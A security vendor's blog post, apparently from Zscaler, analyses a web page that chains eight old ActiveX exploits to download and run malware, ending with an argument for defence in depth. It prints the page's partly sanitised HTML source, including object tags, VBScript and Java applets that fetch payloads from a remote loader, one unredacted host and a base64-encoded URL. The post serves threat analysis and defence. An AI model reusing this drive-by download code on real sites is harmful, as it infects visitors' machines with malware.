- See The Difference
- What is Zero Trust The strategy on which Zscaler was built
- How Zscaler Delivers Zero Trust A platform that enforces policy based on context
- Zero Trust Resources Learn its principles, benefits, strategies
![Zscaler transformation]( "Zscaler transformation")
See how the Zero Trust Exchange can help you leverage cloud, mobility, AI, IoT, and OT technologies to become more agile and reduce risk
- Customer Testimonials Hear first-hand transformation stories
- Analyst Recognition Industry experts weigh in on Zscaler
- See the Zscaler Cloud in Action Traffic processed, malware blocked, and more
- Experience the Difference Get started with zero trust
![Zscaler transformation]( "Zscaler transformation")
See how the Zero Trust Exchange can help you leverage cloud, mobility, AI, IoT, and OT technologies to become more agile and reduce risk
- Platform
- Platform Overview Unified platform for transformation
- Products Integrated services, infinitely scalable
![Zscaler transformation]( "Zscaler transformation")
Accelerate your transformationLearn MoreProtect and empower your business by leveraging the platform, process and people skills to accelerate your zero trust initiatives
- Technologies Global proxy-based cloud architecture
- Capabilities Integrated services, infinitely scalable
![Gartner Report]( "Gartner Report")
Gartner Magic Quadrant LeaderRead the reportZscaler: A Leader in the Gartner® Magic Quadrant™ for Security Service Edge (SSE) New Positioned Highest in the Ability to Execute
- Solutions
- Modern Workplace Enablement
- Security Transformation
- Infrastructure Modernization
- Industries & Partners
- Modern Workplace Enablement Overview Create fast, secure experiences for users everywhere
- Secure Work-from-anywhere Seamless access for the hybrid workforce
- Ensure great digital experiences Seamless access through fast, secure and reliable connectivity
![Zscaler workplace enablement]( "Zscaler workplace enablement")
Make hybrid work possibleGet startedSecure work from anywhere, protect data, and deliver the best experience possible for users
- Security Transformation Overview A modern cloud approach
- Prevent Cyberthreats Prevent phishing, ransomware, and other attacks
- Prevent Data Loss Protect data everywhere from exposure or theft
![Zscaler capabilities]( "Zscaler capabilities")
The World’s Most Effective Ransomware ProtectionGet StartedRansomware is the biggest threat to digital business. Learn how to take a proactive, zero trust approach to safeguarding your enterprise
- Infrastructure Modernization Overview Enable the new world of cloud and mobility
- Simplify Branch Connectivity Simplify and secure direct-to-cloud connections
- Secure Workload Communications Secure communications between clouds and workloads
- Posture Control Identify hidden risks across the cloud lifecycle
![Zscaler infrastructure modernization]( "Zscaler infrastructure modernization")
Enable the Agile BranchWatch NowYour network security is costing more than it’s worth. See how five companies drove simplicity, savings and security
- Industries Our ecosystem of zero trust partners
- Partner Integrations Simplified deployment and management
![Zscaler industry partners]( "Zscaler industry partners")
Secure your ServiceNow DeploymentGet StartedIt’s time to protect your ServiceNow data better and respond to security incidents quicker
- Resources
- Content Library Explore topics that will inform your journey
- Blog Perspectives from technology and transformation leaders
- Security Assessment Toolkit Analyze your environment to see where you could be exposed
- Webinars and Demos A first-hand look into important topics
- Executive Insights App Security insights at your fingertips
- Ransomware ROI Calculator Assess the ROI of ransomware risk reduction
- Training and Certifications Engaging learning experiences, live training, and certifications
- Customer Success Center Quickly connect to resources to accelerate your transformation
![Customer success center]( "Customer success center")
- Security & Threat Analytics Threat dashboards, cloud activity, IoT, and more
- Security Advisories News about security events and protections
- Vulnerability Disclosure Program Webinars, training, demos, and more
- Trust Portal Zscaler cloud status and advisories
![Zscaler resources]( "Zscaler resources")
- Company
- About Zscaler How it began, where it’s going
- Leadership Meet our management team
- Investor Relations News, stock information, and quarterly reports
- Compliance Our adherence to rigorous standards
- ESG Our Environmental, Social, and Governance approach
- Events Upcoming opportunities to meet with Zscaler
![Careet at Zscaler]( "Careet at Zscaler")
Zscaler CareersApply NowJoin a recognized leader in Zero trust to help organization transform securely
- Media Center News, blogs, events, photos, logos, and other brand assets
- News and Press Zscaler in the news
![Careet at Zscaler]( "Careet at Zscaler")
Zscaler CareersApply NowJoin a recognized leader in Zero trust to help organization transform securely
- Partner Portal Tools and resources for Zscaler partners
- Summit Partner Program Collaborating to ensure customer success
- System Integrators Helping joint customers become cloud-first companies
- Service Providers Delivering an integrated platform of services
- Technology Deep integrations simplify cloud migration
- Partner Inquiry Become a Zscaler partner
![Careet at Zscaler]( "Careet at Zscaler")
Zscaler CareersApply NowJoin a recognized leader in Zero trust to help organization transform securely
-
Insights and Research
Remote Downloader ActiveX: Old Exploits, New Malware
ActiveX is a proprietary Microsoft technology, which allows developers to produce reusable software components. The controls are compatible with the Internet Explorer (IE) web browser and over the years have been a frequent security threat, as many developers have produced insecure ActiveX controls which can lead to the remote execution of code when a user with IE visits a malicious web page. This is a very powerful tool for attackers because everything happens in the background (no user interaction), and they can trigger exploitation with only a few lines of code.
I recently stumbled upon a page using no fewer than 8 different ActiveX exploits on the same page:
- Rediff Bol Downloader ActiveX Control Remote Code Execution Vulnerability (2006, CVE-2006-6838)
- Office OCX WordViewer.OCX Word Viewer ActiveX Multiple Vulnerabilities (2007, CVE-2007-2496)
- Symantec AppStream Client 'LaunchObj' ActiveX Control Arbitrary File Download Vulnerability (2008, CVE-2008-4388)
- Peachtree Accounting 'PAWWeb11.ocx' ActiveX Control Insecure Method Vulnerability (2008)
- Multiple Office OCX ActiveX Controls 'OpenWebFile()' Arbitrary Program Execution Vulnerability (2009)
These ActiveX controls attempt to download and install 2 malicious files. One is detected as malware by only 6 out of 40 antivirus engines, the other is detected by 18 antivirus engines.
Blow is the source of page (the malicious CLSIDs and files have been removed):
<html><body><object
classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="OpenWebFile"
VALUE="hxxp://xxx/loading.php?spl=ActiveX_pack"></object>
<object classid="clsid:BBBBBBBB-BBBB-BBBBB-BBBB-BBBBBBBBBBBB">
<PARAM NAME="OpenWebFile"
VALUE="http://xxx/loading.php?spl=ActiveX_pack"> </object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="OpenWebFile"
VALUE="http://xxx/loading.php?spl=ActiveX_pack"> </object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA5">
<PARAM NAME="OpenWebFile"
VALUE="http://ally.serveblog.net//loading.php?spl=ActiveX_pack"> </object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="installAppMgr"
VALUE="http://xxx/loading.php?spl=ActiveX_pack"></object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="PerformUpdateAsync"
VALUE="http://xxx/loading.php?spl=ActiveX_pack"></object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="ExecutePreferredApplication"
VALUE="http://xxx/loading.php?spl=ActiveX_pack"></object>
<OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0"
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"
CODEBASE="http://xxx/DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propProgressbackground" VALUE="#bccee8">
<PARAM NAME="propTextbackground" VALUE="#f7f8fc">
<PARAM NAME="propBarColor" VALUE="#df0203">
<PARAM NAME="propTextColor" VALUE="#000000">
<PARAM NAME="propWidth" VALUE="0">
<PARAM NAME="propHeight" VALUE="0">
<PARAM NAME="propDownloadUrl"
VALUE="http://xxx/loading.php?spl=ActiveX_pack">
<PARAM NAME="propPostdownloadAction" VALUE="run">
<PARAM NAME="propInstallCompleteUrl" VALUE="">
<PARAM NAME="propbrowserRedirectUrl" VALUE="">
<PARAM NAME="propVerbose" VALUE="0">
<PARAM NAME="propInterrupt" VALUE="0"> </OBJECT>
<OBJECT id="sysWIN" WIDTH=1 HEIGHT=1
classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA"
codebase="http://xxx/Bol.CAB"></OBJECT>
<script language="vbscript">
sysWIN.url = "http://xxx/loading.php?spl=ActiveX_pack"
sysWIN.fontsize = 10sysWIN.barcolor = 00FF00
sysWIN.start = "start"</script>
<applet code="sklif.Hieeyfc.class" archive="j1_ke.jar" width="480"
height="200">
<param name="data" VALUE="http://xxx/loading.php?spl=javadnwa&">
<param name="cc" value="1"> </applet>
<applet width="100%" height="100%" code="Uutecwv" archive="j2_93.jar">
<param name="site"
VALUE="aHR0cDovL2FsbHkuc2VydmVibG9nLm5ldC8vbG9hZGluZy5waHA/c3BsPWphdmFkbndiJg==">
</applet>
it is interesting to see that this page is using fairly old, and relatively well known, browser exploits along with state-of-the-art viruses virtually invisible to most antivirus software. Some people have argued that desktop antivirus protection alone is good enough because the exploit is just a means of delivering the malicious payload, and stopping this payload is all you need to do, in order to be protected. However, relying on a single layer of security is very risky. Catching the exploit can sometimes be easier, so you really need to take a defense-in-depth approach to security - patch your software, detect exploits, detect malicious payloads.
-- Julien